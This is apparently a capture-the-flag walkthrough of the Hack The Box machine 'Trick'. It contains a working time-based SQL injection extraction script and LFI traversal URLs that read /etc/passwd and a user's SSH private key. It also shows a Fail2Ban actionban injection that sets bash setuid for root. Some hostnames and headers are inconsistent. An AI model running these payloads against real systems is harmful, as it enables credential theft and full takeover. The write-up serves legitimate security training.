Trick

March 01, 2026

Driver

Created by	Page	Difficulty	OS
Geiseric	Hack The Box	Easy	Linux

Enumeration

I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports

  nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.166 -oG scan
  /opt/extractports scan
  nmap -p22,25,53,80 -Pn -sCV 10.10.11.166 -oN ports

Initial Access (DNS Enumeration)

To identify the domain associated with the target IP, I performed a reverse DNS lookup
```
  dig +noall +answer @10.10.11.166 -x 10.10.11.166
```
I found the domain trick.htb and I add it to the file in the hosts file
The zone transfer was misconfigured and allowed, leaking an additional subdomain
```
  dig @10.10.11.166 trick.htb axfr 
```
I found the domain preprod-payroll.trick.htb and I add it to the file in the hosts file
Web enumeration - trick.htb
I performed standard directory and file enumeration against trick.htb, but did not identify any interesting attack surface.

Web enumeration - preprod-marketing.trick.htb

The application running on this subdomain was identified as Payroll Management System.
After researching known vulnerabilities, I found CVE-2024-8567, which allows SQL injection via the username parameter in the login request.

I confirmed the vulnerability using a time-based SQL injection:

curl 'http://preprod-marketing.trick.htb/ajax.php?action=login' 
	--data "username=' or sleep(5)-- &password=pepe"

The delayed response confirmed that the parameter was injectable.

Database Enumeration via SQL Injection

To automate data extraction, I wrote a custom Python script to enumerate the database contents via the time-based SQL injection.

#!/usr/bin/python
import requests
import sys
import signal
import time
import string
from pwn import *
  
  
def def_handler(sig, frame):
    print("\n\n[!]Saliendo....\n")
    sys.exit(1)
  
signal.signal(signal.SIGINT, def_handler)
  
main_url = "http://preprod-payroll.trick.htb/ajax.php?action=login"
characters = string.printable
  
def makeSQLI():
    username = ""
    p1 = log.progress("Fuerza bruta")
    p1.status("Iniciando proceso de fuerza bruta")
    p2 = log.progress("Datos extraidos")
    #probar desdse el ascii 33 hasta el 126
    for position in range(1, 200):
        for character in range(33,126):
            #payload = "username=' or if(ascii(substr(( SELECT group_concat(DATABASE()) ) ,%d,1))=%d,sleep(5),1)-- &password=pepe" % (position, character)
            #payload = "username=' or if(ascii(substr(( select group_concat(schema_name) from information_schema.schemata ),%d,1))=%d,sleep(5),1)-- &password=pepe" % (position, character)
  
  
            #payload ="username=' or if(ascii(substr(( select group_concat(table_name) from information_schema.tables where table_schema='payroll_db' ),%d,1))=%d,sleep(5),1)-- &password=pepe" % (position, character)
            #position,employee,department,payroll_items,attendance,emplo....
  
  
            #payload ="username=' or if(ascii(substr(( select group_concat(table_name) from information_schema.tables where table_schema='payroll_db' and table_name like '%%SER%%'  ),%d,1))=%d,sleep(5),1)-- &password=pepe" % (position, character)
            #users
  
            #payload = "username=' or if(ascii(substr(( select group_concat(column_name) from information_schema.columns where table_schema='payroll_db' and table_name like '%%MPLO%%' ),%d,1))=%d,sleep(5),1)-- &password=pepe" % (position, character)
            #id,employee_no,firstname,middlename,lastname,department_id,position_id,salaray,
  
            #payload = "username=' or if(ascii(substr(( select group_concat(column_name) from information_schema.columns where table_schema='payroll_db' and table_name like '%%SER%%' ),%d,1))=%d,sleep(5),1)-- &password=pepe" % (position, character)
            #id,doctor_id,name,address,contact,username,password
  
            payload = "username=' or if(ascii(substr(( select group_concat(username,0x3a,password) from users ),%d,1))=%d,sleep(5),1)-- &password=pepe" % (position, character)
            #Enemigosss:SuperGucciRainbowCake
              
            payload = "username=' or ascii(substr(( SELECT group_concat(load_file('/etc/passwd') )) ,%d,1))=%d -- &password=pepe" % (position, character)
              
            header = {"Content-Type": "application/x-www-form-urlencoded"}
            p1.status(payload)
            startTime = time.time()
            r = requests.post(main_url, headers = header ,data=payload, timeout=7)
            elapse = time.time() - startTime
  
  
            if (elapse >= 4.0):
                username += chr(character)
                p2.status(username)
                break
  
if __name__ == '__main__':
    makeSQLI()

Using this script, I extracted valid credentials

Username: Enemigosss
Password: SuperGucciRainbowCake

These credentials allowed authentication to the CMS; however, no further privilege escalation was possible from within the application.

Local File Inclusion (LFI)

While inspecting the application, I noticed that the main page dynamically loaded resources based on a page parameter.

I performed brute-force enumeration to identify additional PHP files:

  ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://preprod-marketing.trick.htb/index.php?page=FUZZ.php

This revealed a Local File Inclusion (LFI) vulnerability.

Using directory traversal, I was able to read system files

  http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd

From /etc/passwd, I identified a local user named michael, whose home directory was /home/michael.

I then retrieved the user’s private SSH key:

http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//home//michael//.ssh/id_rsa

After downloading the private key, I authenticated via SSH:

chmod 400 id_rsa 
ssh -i id_rsa michael@10.10.11.166

Privilege Escalation

I checked which commands the user michael could execute as root without a password
```
  sudo -l
```
The user was allowed to restart Fail2Ban
```
sudo /etc/init.d/fail2ban restart
```
Fail2Ban is a Python-based intrusion prevention service that executes external actions when banning IPs
I reviewed its configuration file:
```
  /etc/fail2ban/jail.conf
```
Based on known exploitation techniques, I modified the iptables-multiport.conf action file and injected a malicious payload into the actionban directive
```
  chmod u+s /bin/bash
```
After restarting the service
```
  sudo /etc/init.d/fail2ban restart
```

I triggered a ban event by brute-forcing SSH

  hydra -l root -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-10.txt ssh://10.10.11.166

This caused Fail2Ban to execute my payload. I then spawned a privileged shell
```
/bin/bash -p
```
With root privileges, I retrieved the final flag